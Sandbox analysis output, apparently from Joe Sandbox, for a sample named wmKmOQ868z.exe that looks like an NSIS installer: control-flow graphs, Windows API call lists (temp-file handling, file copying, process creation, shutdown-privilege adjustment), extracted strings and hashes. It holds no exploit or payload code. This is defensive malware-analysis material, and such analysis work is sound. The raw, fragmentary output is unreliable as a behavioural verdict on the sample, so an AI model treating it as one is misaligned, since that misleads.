GetWindowLongW 2382->2384 2383->2295 2384->2383 2385 404567 2384->2385 2385->2383 2386 404594 GetSysColor 2385->2386 2387 404597 2385->2387 2386->2387 2388 4045a7 SetBkMode 2387->2388 2389 40459d SetTextColor 2387->2389 2390 4045c5 2388->2390 2391 4045bf GetSysColor 2388->2391 2389->2388 2392 4045d6 2390->2392 2393 4045cc SetBkColor 2390->2393 2391->2390 2392->2383 2394 4045f0 CreateBrushIndirect 2392->2394 2395 4045e9 DeleteObject 2392->2395 2393->2392 2394->2383 2395->2394 2419 4063c1 2396->2419 2399 406486 2399->2361 2400 406456 RegQueryValueExW RegCloseKey 2400->2399 2402 406964 2401->2402 2403 40696e GetProcAddress 2401->2403 2423 4068d8 GetSystemDirectoryW 2402->2423 2405 40697d 2403->2405 2405->2361 2406 40696a 2406->2403 2406->2405 2408 40680f 2407->2408 2410 406878 CharNextW 2408->2410 2412 406885 2408->2412 2414 406864 CharNextW 2408->2414 2415 406873 CharNextW 2408->2415 2426 405e50 2408->2426 2409 40688a CharPrevW 2409->2412 2410->2408 2410->2412 2412->2409 2413 4068ab 2412->2413 2413->2361 2414->2408 2415->2410 2416->2361 2417->2361 2418->2348 2420 4063d0 2419->2420 2421 4063d4 2420->2421 2422 4063d9 RegOpenKeyExW 2420->2422 2421->2399 2421->2400 2422->2421 2424 4068fa wsprintfW LoadLibraryExW 2423->2424 2424->2406 2427 405e56 2426->2427 2428 405e6c 2427->2428 2429 405e5d CharNextW 2427->2429 2428->2408 2429->2427 3084 402fb8 3085 402fe3 3084->3085 3086 402fca SetTimer 3084->3086 3087 403038 3085->3087 3088 402ffd MulDiv wsprintfW SetWindowTextW SetDlgItemTextW 3085->3088 3086->3085 3088->3087 3095 6f7023e9 3096 6f702453 3095->3096 3097 6f70245e GlobalAlloc 3096->3097 3098 6f70247d 3096->3098 3097->3096 3102 6f70170d 3103 6f7015b6 GlobalFree 3102->3103 3105 6f701725 3103->3105 3104 6f70176b GlobalFree 3105->3104 3106 6f701740 3105->3106 3107 6f701757 VirtualFree 3105->3107 3106->3104 3107->3104

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 0 40352f-403581 SetErrorMode GetVersionExW 1 403583-4035b3 GetVersionExW 0->1 2 4035bb-4035c0 0->2 1->2 3 4035c2 2->3 4 4035c8-40360a 2->4 3->4 5 40360c-403614 call 406948 4->5 6 40361d 4->6 5->6 11 403616 5->11 8 403622-403636 call 4068d8 lstrlenA 6->8 13 403638-403654 call 406948 * 3 8->13 11->6 20 403665-4036c9 #17 OleInitialize SHGetFileInfoW call 406554 GetCommandLineW call 406554 13->20 21 403656-40365c 13->21 28 4036d2-4036e6 call 405e50 CharNextW 20->28 29 4036cb-4036cd 20->29 21->20 25 40365e 21->25 25->20 32 4037e1-4037e7 28->32 29->28 33 4036eb-4036f1 32->33 34 4037ed 32->34 35 4036f3-4036f8 33->35 36 4036fa-403701 33->36 37 403801-40381b GetTempPathW call 4034fe 34->37 35->35 35->36 38 403703-403708 36->38 39 403709-40370d 36->39 47 403873-40388d DeleteFileW call 4030a2 37->47 48 40381d-40383b GetWindowsDirectoryW lstrcatW call 4034fe 37->48 38->39 41 403713-403719 39->41 42 4037ce-4037dd call 405e50 39->42 45 403733-40376c 41->45 46 40371b-403722 41->46 42->32 59 4037df-4037e0 42->59 53 403789-4037c3 45->53 54 40376e-403773 45->54 51 403724-403727 46->51 52 403729 46->52 64 403893-403899 47->64 65 403a7a-403a8a call 403b4c OleUninitialize 47->65 48->47 62 40383d-40386d GetTempPathW lstrcatW SetEnvironmentVariableW * 2 call 4034fe 48->62 51->45 51->52 52->45 57 4037c5-4037c9 53->57 58 4037cb-4037cd 53->58 54->53 61 403775-40377d 54->61 57->58 63 4037ef-4037fc call 406554 57->63 58->42 59->32 66 403784 61->66 67 40377f-403782 61->67 62->47 62->65 63->37 70 403932-403939 call 403c26 64->70 71 40389f-4038aa call 405e50 64->71 77 403ab0-403ab6 65->77 78 403a8c-403a9c call 405bb4 ExitProcess 65->78 66->53 67->53 67->66 80 40393e-403942 70->80 82 4038f8-403902 71->82 83 4038ac-4038e1 71->83 84 403b34-403b3c 77->84 85 403ab8-403ace GetCurrentProcess OpenProcessToken 77->85 80->65 86 403904-403912 call 405f2b 82->86 87 403947-40396d call 405b1f lstrlenW call 406554 82->87 91 4038e3-4038e7 83->91 88 403b42-403b46 ExitProcess 84->88 89 403b3e 84->89 92 403ad0-403afe LookupPrivilegeValueW AdjustTokenPrivileges 85->92 93 403b04-403b12 call 406948 85->93 86->65 105 403918-40392e call 406554 * 2 86->105 110 40397e-403996 87->110 111 40396f-403979 call 406554 87->111 89->88 96 4038f0-4038f4 91->96 97 4038e9-4038ee 91->97 92->93 103 403b20-403b2b ExitWindowsEx 93->103 104 403b14-403b1e 93->104 96->91 102 4038f6 96->102 97->96 97->102 102->82 103->84 108 403b2d-403b2f call 40140b 103->108 104->103 104->108 105->70 108->84 116 40399b-40399f 110->116 111->110 118 4039a4-4039ce wsprintfW call 406591 116->118 122 4039d0 call 405aa8 118->122 123 4039d7 call 405b02 118->123 126 4039d5 122->126 127 4039dc-4039de 123->127 126->127 128 4039e0-4039ea GetFileAttributesW 127->128 129 403a1a-403a39 SetCurrentDirectoryW call 406314 CopyFileW 127->129 131 403a0b-403a16 128->131 132 4039ec-4039f5 DeleteFileW 128->132 137 403a78 129->137 138 403a3b-403a55 call 406314 call 406591 call 405b37 129->138 131->116 134 403a18 131->134 132->131 133 4039f7-403a09 call 405c60 132->133 133->118 133->131 134->65 137->65 145 403a5a-403a5c 138->145 146 403aa2-403aae CloseHandle 145->146 147 403a5e-403a68 145->147 146->137 147->137 148 403a6a-403a72 call 4068b1 147->148 148->118 148->137
                                          APIs
                                          • SetErrorMode.KERNELBASE(00008001), ref: 00403552
                                          • GetVersionExW.KERNEL32(?), ref: 0040357D
                                          • GetVersionExW.KERNEL32(?), ref: 00403590
                                          • lstrlenA.KERNEL32(UXTHEME,UXTHEME), ref: 00403629
                                          • #17.COMCTL32(?,00000008,0000000A,0000000C), ref: 00403666
                                          • OleInitialize.OLE32(00000000), ref: 0040366D
                                          • SHGetFileInfoW.SHELL32(0079F708,00000000,?,000002B4,00000000), ref: 0040368C
                                          • GetCommandLineW.KERNEL32(007A7260,NSIS Error,?,00000008,0000000A,0000000C), ref: 004036A1
                                          • CharNextW.USER32(00000000,"C:\Users\user\Desktop\wmKmOQ868z.exe",00000020,"C:\Users\user\Desktop\wmKmOQ868z.exe",00000000,?,00000008,0000000A,0000000C), ref: 004036DA
                                          • GetTempPathW.KERNEL32(00000400,C:\Users\user\AppData\Local\Temp\,00000000,0000000C,?,00000008,0000000A,0000000C), ref: 00403812
                                          • GetWindowsDirectoryW.KERNEL32(C:\Users\user\AppData\Local\Temp\,000003FB,?,00000008,0000000A,0000000C), ref: 00403823
                                          • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,\Temp,?,00000008,0000000A,0000000C), ref: 0040382F
                                          • GetTempPathW.KERNEL32(000003FC,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,\Temp,?,00000008,0000000A,0000000C), ref: 00403843
                                          • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,Low,?,00000008,0000000A,0000000C), ref: 0040384B
                                          • SetEnvironmentVariableW.KERNEL32(TEMP,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,Low,?,00000008,0000000A,0000000C), ref: 0040385C
                                          • SetEnvironmentVariableW.KERNEL32(TMP,C:\Users\user\AppData\Local\Temp\,?,00000008,0000000A,0000000C), ref: 00403864
                                          • DeleteFileW.KERNELBASE(1033,?,00000008,0000000A,0000000C), ref: 00403878
                                          • lstrlenW.KERNEL32(C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\wmKmOQ868z.exe",00000000,0000000A), ref: 00403951
                                            • Part of subcall function 00406554: lstrcpynW.KERNEL32(?,?,00000400,004036A1,007A7260,NSIS Error,?,00000008,0000000A,0000000C), ref: 00406561
                                          • wsprintfW.USER32 ref: 004039AE
                                          • GetFileAttributesW.KERNEL32(007AB800,C:\Users\user\AppData\Local\Temp\,007AB800,?), ref: 004039E1
                                          • DeleteFileW.KERNEL32(007AB800), ref: 004039ED
                                          • SetCurrentDirectoryW.KERNEL32(C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,007AB800,?), ref: 00403A1B
                                            • Part of subcall function 00406314: MoveFileExW.KERNEL32(?,?,00000005,00405E12,?,00000000,000000F1,?,?,?,?,?), ref: 0040631E
                                          • CopyFileW.KERNEL32(C:\Users\user\Desktop\wmKmOQ868z.exe,007AB800,00000001,C:\Users\user\AppData\Local\Temp\,00000000), ref: 00403A31
                                            • Part of subcall function 00405B37: CreateProcessW.KERNELBASE(00000000,?,00000000,00000000,00000000,04000000,00000000,00000000,007A4750,?), ref: 00405B60
                                            • Part of subcall function 00405B37: CloseHandle.KERNEL32(?), ref: 00405B6D
                                            • Part of subcall function 004068B1: FindFirstFileW.KERNELBASE(?,007A4798,007A3F50,00405F74,007A3F50,007A3F50,00000000,007A3F50,007A3F50,?,?,C:\Users\user\AppData\Local\Temp\,00405C80,?,75923420,C:\Users\user\AppData\Local\Temp\), ref: 004068BC
                                            • Part of subcall function 004068B1: FindClose.KERNELBASE(00000000), ref: 004068C8
                                          • OleUninitialize.OLE32(0000000A,?,00000008,0000000A,0000000C), ref: 00403A7F
                                          • ExitProcess.KERNEL32 ref: 00403A9C
                                          • CloseHandle.KERNEL32(00000000,007AC000,007AC000,?,007AB800,00000000), ref: 00403AA3
                                          • GetCurrentProcess.KERNEL32(00000028,?,00000008,0000000A,0000000C), ref: 00403ABF
                                          • OpenProcessToken.ADVAPI32(00000000), ref: 00403AC6
                                          • LookupPrivilegeValueW.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 00403ADB
                                          • AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000), ref: 00403AFE
                                          • ExitWindowsEx.USER32(00000002,80040002), ref: 00403B23
                                          • ExitProcess.KERNEL32 ref: 00403B46
                                            • Part of subcall function 00405B02: CreateDirectoryW.KERNELBASE(?,00000000,00403522,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403819,?,00000008,0000000A,0000000C), ref: 00405B08
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2652448321.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.2652423828.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2652463308.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2652479184.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2652479184.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2652479184.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2652479184.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2652479184.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2652479184.00000000007A3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2652479184.00000000007A5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2652479184.00000000007AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2652479184.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2652479184.00000000007E7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2652479184.00000000007F4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2652822257.00000000007F6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_wmKmOQ868z.jbxd
                                          Similarity
                                          • API ID: File$Process$CloseDirectoryExit$CreateCurrentDeleteEnvironmentFindHandlePathTempTokenVariableVersionWindowslstrcatlstrlen$AdjustAttributesCharCommandCopyErrorFirstInfoInitializeLineLookupModeMoveNextOpenPrivilegePrivilegesUninitializeValuelstrcpynwsprintf
                                          • String ID: "C:\Users\user\Desktop\wmKmOQ868z.exe"$1033$C:\Users\user\AppData\Local\Temp\$C:\Users\user\Desktop$C:\Users\user\Desktop\wmKmOQ868z.exe$C:\Users\user\imaums\outadmiral\nedrunde$C:\Users\user\imaums\outadmiral\nedrunde\Thomismens$Error launching installer$Low$NSIS Error$SeShutdownPrivilege$TEMP$TMP$UXTHEME$\Temp$~nsu%X.tmp
                                          • API String ID: 1813718867-2798901685
                                          • Opcode ID: 4539d7b49e661c335d86d711c7dc70c0ceacb82e8b10bfdaa1b9f15d78561598
                                          • Instruction ID: 93f5a648143c5b163d48a65c291177ce643c8a453b959a17227cb1525d46e2db
                                          • Opcode Fuzzy Hash: 4539d7b49e661c335d86d711c7dc70c0ceacb82e8b10bfdaa1b9f15d78561598
                                          • Instruction Fuzzy Hash: 2CF10370604301AAD720AF659D05B2B7EE8EF85706F00483EF581B62D2DB7DDA45CB6E

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 399 405c60-405c86 call 405f2b 402 405c88-405c9a DeleteFileW 399->402 403 405c9f-405ca6 399->403 404 405e1c-405e20 402->404 405 405ca8-405caa 403->405 406 405cb9-405cc9 call 406554 403->406 408 405cb0-405cb3 405->408 409 405dca-405dcf 405->409 412 405cd8-405cd9 call 405e6f 406->412 413 405ccb-405cd6 lstrcatW 406->413 408->406 408->409 409->404 411 405dd1-405dd4 409->411 414 405dd6-405ddc 411->414 415 405dde-405de6 call 4068b1 411->415 416 405cde-405ce2 412->416 413->416 414->404 415->404 423 405de8-405dfc call 405e23 call 405c18 415->423 419 405ce4-405cec 416->419 420 405cee-405cf4 lstrcatW 416->420 419->420 422 405cf9-405d15 lstrlenW FindFirstFileW 419->422 420->422 424 405d1b-405d23 422->424 425 405dbf-405dc3 422->425 439 405e14-405e17 call 4055d9 423->439 440 405dfe-405e01 423->440 428 405d43-405d57 call 406554 424->428 429 405d25-405d2d 424->429 425->409 427 405dc5 425->427 427->409 441 405d59-405d61 428->441 442 405d6e-405d79 call 405c18 428->442 431 405da2-405db2 FindNextFileW 429->431 432 405d2f-405d37 429->432 431->424 436 405db8-405db9 FindClose 431->436 432->428 437 405d39-405d41 432->437 436->425 437->428 437->431 439->404 440->414 443 405e03-405e12 call 4055d9 call 406314 440->443 441->431 444 405d63-405d6c call 405c60 441->444 452 405d9a-405d9d call 4055d9 442->452 453 405d7b-405d7e 442->453 443->404 444->431 452->431 456 405d80-405d90 call 4055d9 call 406314 453->456 457 405d92-405d98 453->457 456->431 457->431
                                          APIs
                                          • DeleteFileW.KERNELBASE(?,?,75923420,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\wmKmOQ868z.exe"), ref: 00405C89
                                          • lstrcatW.KERNEL32(frihedens\statsraaden.ond,\*.*,frihedens\statsraaden.ond,?,?,75923420,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\wmKmOQ868z.exe"), ref: 00405CD1
                                          • lstrcatW.KERNEL32(?,0040A014,?,frihedens\statsraaden.ond,?,?,75923420,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\wmKmOQ868z.exe"), ref: 00405CF4
                                          • lstrlenW.KERNEL32(?,?,0040A014,?,frihedens\statsraaden.ond,?,?,75923420,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\wmKmOQ868z.exe"), ref: 00405CFA
                                          • FindFirstFileW.KERNELBASE(frihedens\statsraaden.ond,?,?,?,0040A014,?,frihedens\statsraaden.ond,?,?,75923420,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\wmKmOQ868z.exe"), ref: 00405D0A
                                          • FindNextFileW.KERNEL32(00000000,?,000000F2,?,?,?,?,?), ref: 00405DAA
                                          • FindClose.KERNEL32(00000000), ref: 00405DB9
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2652448321.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.2652423828.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2652463308.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2652479184.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2652479184.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2652479184.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2652479184.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2652479184.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2652479184.00000000007A3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2652479184.00000000007A5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2652479184.00000000007AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2652479184.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2652479184.00000000007E7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2652479184.00000000007F4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2652822257.00000000007F6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_wmKmOQ868z.jbxd
                                          Similarity
                                          • API ID: FileFind$lstrcat$CloseDeleteFirstNextlstrlen
                                          • String ID: "C:\Users\user\Desktop\wmKmOQ868z.exe"$C:\Users\user\AppData\Local\Temp\$\*.*$frihedens\statsraaden.ond
                                          • API String ID: 2035342205-4210479706
                                          • Opcode ID: 504f622c36c52388dc620547c7079f2cd4c31ca565287661d2c47a2285e6f56d
                                          • Instruction ID: f748e5475402f1fc91d3f7fbe8cbfa38c73e6686c0f945f98d649a4eb698cdfa
                                          • Opcode Fuzzy Hash: 504f622c36c52388dc620547c7079f2cd4c31ca565287661d2c47a2285e6f56d
                                          • Instruction Fuzzy Hash: EB41B231800A14B6DB216B26CC49BAF7678EF81714F20813BF441B11D1DB7C4A829EAE
                                          APIs
                                          • FindFirstFileW.KERNELBASE(?,007A4798,007A3F50,00405F74,007A3F50,007A3F50,00000000,007A3F50,007A3F50,?,?,C:\Users\user\AppData\Local\Temp\,00405C80,?,75923420,C:\Users\user\AppData\Local\Temp\), ref: 004068BC
                                          • FindClose.KERNELBASE(00000000), ref: 004068C8
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2652448321.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.2652423828.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2652463308.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2652479184.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2652479184.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2652479184.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2652479184.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2652479184.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2652479184.00000000007A3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2652479184.00000000007A5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2652479184.00000000007AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2652479184.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2652479184.00000000007E7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2652479184.00000000007F4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2652822257.00000000007F6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_wmKmOQ868z.jbxd
                                          Similarity
                                          • API ID: Find$CloseFileFirst
                                          • String ID:
                                          • API String ID: 2295610775-0
                                          • Opcode ID: 66bf9994b2f5814cd2018ee22faa20966fcafcce3cd9b2dc1ade219dc7786d58
                                          • Instruction ID: c1f58c6a55c378a7321320ff0386b713db4abc0e26cca29c2297fdfd4174c4a1
                                          • Opcode Fuzzy Hash: 66bf9994b2f5814cd2018ee22faa20966fcafcce3cd9b2dc1ade219dc7786d58
                                          • Instruction Fuzzy Hash: CFD0123251A1305BC28027386D0C84B7B98AF56331712CB36F16AF21E0C7748C6287A8

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 151 403fd4-403fe6 152 403fec-403ff2 151->152 153 40414d-40415c 151->153 152->153 156 403ff8-404001 152->156 154 4041ab-4041c0 153->154 155 40415e-4041a6 GetDlgItem * 2 call 4044d3 SetClassLongW call 40140b 153->155 158 404200-404205 call 40451f 154->158 159 4041c2-4041c5 154->159 155->154 160 404003-404010 SetWindowPos 156->160 161 404016-40401d 156->161 168 40420a-404225 158->168 165 4041c7-4041d2 call 401389 159->165 166 4041f8-4041fa 159->166 160->161 162 404061-404067 161->162 163 40401f-404039 ShowWindow 161->163 171 404080-404083 162->171 172 404069-40407b DestroyWindow 162->172 169 40413a-404148 call 40453a 163->169 170 40403f-404052 GetWindowLongW 163->170 165->166 192 4041d4-4041f3 SendMessageW 165->192 166->158 175 4044a0 166->175 176 404227-404229 call 40140b 168->176 177 40422e-404234 168->177 181 4044a2-4044a9 169->181 170->169 178 404058-40405b ShowWindow 170->178 182 404085-404091 SetWindowLongW 171->182 183 404096-40409c 171->183 179 40447d-404483 172->179 175->181 176->177 189 40423a-404245 177->189 190 40445e-404477 DestroyWindow EndDialog 177->190 178->162 179->175 188 404485-40448b 179->188 182->181 183->169 191 4040a2-4040b1 GetDlgItem 183->191 188->175 193 40448d-404496 ShowWindow 188->193 189->190 194 40424b-404298 call 406591 call 4044d3 * 3 GetDlgItem 189->194 190->179 195 4040d0-4040d3 191->195 196 4040b3-4040ca SendMessageW IsWindowEnabled 191->196 192->181 193->175 223 4042a2-4042de ShowWindow KiUserCallbackDispatcher call 4044f5 EnableWindow 194->223 224 40429a-40429f 194->224 198 4040d5-4040d6 195->198 199 4040d8-4040db 195->199 196->175 196->195 201 404106-40410b call 4044ac 198->201 202 4040e9-4040ee 199->202 203 4040dd-4040e3 199->203 201->169 204 4040f0-4040f6 202->204 205 404124-404134 SendMessageW 202->205 203->205 208 4040e5-4040e7 203->208 209 4040f8-4040fe call 40140b 204->209 210 40410d-404116 call 40140b 204->210 205->169 208->201 219 404104 209->219 210->169 220 404118-404122 210->220 219->201 220->219 227 4042e0-4042e1 223->227 228 4042e3 223->228 224->223 229 4042e5-404313 GetSystemMenu EnableMenuItem SendMessageW 227->229 228->229 230 404315-404326 SendMessageW 229->230 231 404328 229->231 232 40432e-40436d call 404508 call 403fb5 call 406554 lstrlenW call 406591 SetWindowTextW call 401389 230->232 231->232 232->168 243 404373-404375 232->243 243->168 244 40437b-40437f 243->244 245 404381-404387 244->245 246 40439e-4043b2 DestroyWindow 244->246 245->175 247 40438d-404393 245->247 246->179 248 4043b8-4043e5 CreateDialogParamW 246->248 247->168 249 404399 247->249 248->179 250 4043eb-404442 call 4044d3 GetDlgItem GetWindowRect ScreenToClient SetWindowPos call 401389 248->250 249->175 250->175 255 404444-40445c ShowWindow call 40451f 250->255 255->179
                                          APIs
                                          • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000013), ref: 00404010
                                          • ShowWindow.USER32(?), ref: 00404030
                                          • GetWindowLongW.USER32(?,000000F0), ref: 00404042
                                          • ShowWindow.USER32(?,00000004), ref: 0040405B
                                          • DestroyWindow.USER32 ref: 0040406F
                                          • SetWindowLongW.USER32(?,00000000,00000000), ref: 00404088
                                          • GetDlgItem.USER32(?,?), ref: 004040A7
                                          • SendMessageW.USER32(00000000,000000F3,00000000,00000000), ref: 004040BB
                                          • IsWindowEnabled.USER32(00000000), ref: 004040C2
                                          • GetDlgItem.USER32(?,00000001), ref: 0040416D
                                          • GetDlgItem.USER32(?,00000002), ref: 00404177
                                          • SetClassLongW.USER32(?,000000F2,?), ref: 00404191
                                          • SendMessageW.USER32(0000040F,00000000,00000001,?), ref: 004041E2
                                          • GetDlgItem.USER32(?,00000003), ref: 00404288
                                          • ShowWindow.USER32(00000000,?), ref: 004042A9
                                          • KiUserCallbackDispatcher.NTDLL(?,?), ref: 004042BB
                                          • EnableWindow.USER32(?,?), ref: 004042D6
                                          • GetSystemMenu.USER32(?,00000000,0000F060,00000001), ref: 004042EC
                                          • EnableMenuItem.USER32(00000000), ref: 004042F3
                                          • SendMessageW.USER32(?,000000F4,00000000,00000001), ref: 0040430B
                                          • SendMessageW.USER32(?,00000401,00000002,00000000), ref: 0040431E
                                          • lstrlenW.KERNEL32(007A1748,?,007A1748,00000000), ref: 00404348
                                          • SetWindowTextW.USER32(?,007A1748), ref: 0040435C
                                          • ShowWindow.USER32(?,0000000A), ref: 00404490
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2652448321.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.2652423828.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2652463308.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2652479184.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2652479184.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2652479184.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2652479184.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2652479184.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2652479184.00000000007A3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2652479184.00000000007A5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2652479184.00000000007AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2652479184.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2652479184.00000000007E7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2652479184.00000000007F4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2652822257.00000000007F6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_wmKmOQ868z.jbxd
                                          Similarity
                                          • API ID: Window$Item$MessageSendShow$Long$EnableMenu$CallbackClassDestroyDispatcherEnabledSystemTextUserlstrlen
                                          • String ID:
                                          • API String ID: 121052019-0
                                          • Opcode ID: bc3e7111866138a7d9fc3d457d106daad5acaba352cfb8b9f49eaf3ae0b18d54
                                          • Instruction ID: 556acdb9000d186b886cde9212830cd241fbea6c4840fceff67d75b478af1997
                                          • Opcode Fuzzy Hash: bc3e7111866138a7d9fc3d457d106daad5acaba352cfb8b9f49eaf3ae0b18d54
                                          • Instruction Fuzzy Hash: 13C1C0B1500604ABDB206F61ED85B2A3A68FBD6359F00453EF791B51F0CB3D5891DB2E

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
